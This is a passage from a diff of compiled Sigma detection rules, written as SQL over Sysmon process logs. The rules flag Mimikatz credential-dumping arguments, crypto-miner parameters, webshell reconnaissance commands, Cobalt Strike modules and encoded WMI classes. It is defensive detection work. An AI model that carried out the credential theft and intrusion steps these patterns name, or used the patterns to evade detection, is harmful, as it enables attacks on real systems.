Bencherchali", + "tags": [ + "attack.execution", + "attack.t1047" + ], "falsepositives": [ - "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_decode_gzip.yml" + "filename": "proc_creation_win_wmic_recon_product.yml" }, { - "title": "Detect Virtualbox Driver Installation OR Starting Of VMs", - "id": "bab049ca-7471-4828-9024-38279a4c04da", + "title": "Gpresult Display Group Policy Information", + "id": "e56d3073-83ff-4021-90fe-c658e0709e72", "status": "experimental", - "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", - "author": "Janantha Marasinghe", + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.006", - "attack.t1564" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "This may have false positives on hosts where Virtualbox is legitimately being used for operations" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%VBoxRT.dll,RTR3Init%' ESCAPE '\\' OR CommandLine LIKE '%VBoxC.dll%' ESCAPE '\\' OR CommandLine LIKE '%VBoxDrv.sys%' ESCAPE '\\') OR (CommandLine LIKE '%startvm%' ESCAPE '\\' OR CommandLine LIKE '%controlvm%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_virtualbox_execution.yml" + "filename": "proc_creation_win_gpresult_execution.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "status": "stable", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + "Some build frameworks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "LOLBIN Execution Of The FTP.EXE Binary", - "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", "status": "test", - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ftp.yml" + "filename": "proc_creation_win_script_execution.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tap Installer Execution", + "id": "99793437-3e16-439b-be0f-078782cf953d", + "status": "test", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_tapinstall_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "title": "Renamed Remote Utilities RAT (RURAT) Execution", + "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Remote Utilities' AND NOT ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_renamed_rurat.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", + "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_detection.yml" + "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" }, { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", + "title": "PowerShell Get-Clipboard Cmdlet Via CLI", + "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "status": "test", + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_powershell_get_clipboard.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", - "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1053.002" ], "falsepositives": [ - "Unknown" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", - "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "status": "experimental", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Potential System Information Discovery Via Wmic.EXE", + "id": "9d5a1274-922a-49d0-87f3-8c653483b909", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", + "author": "TropChaud", "tags": [ "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.t1082" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unlikely" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 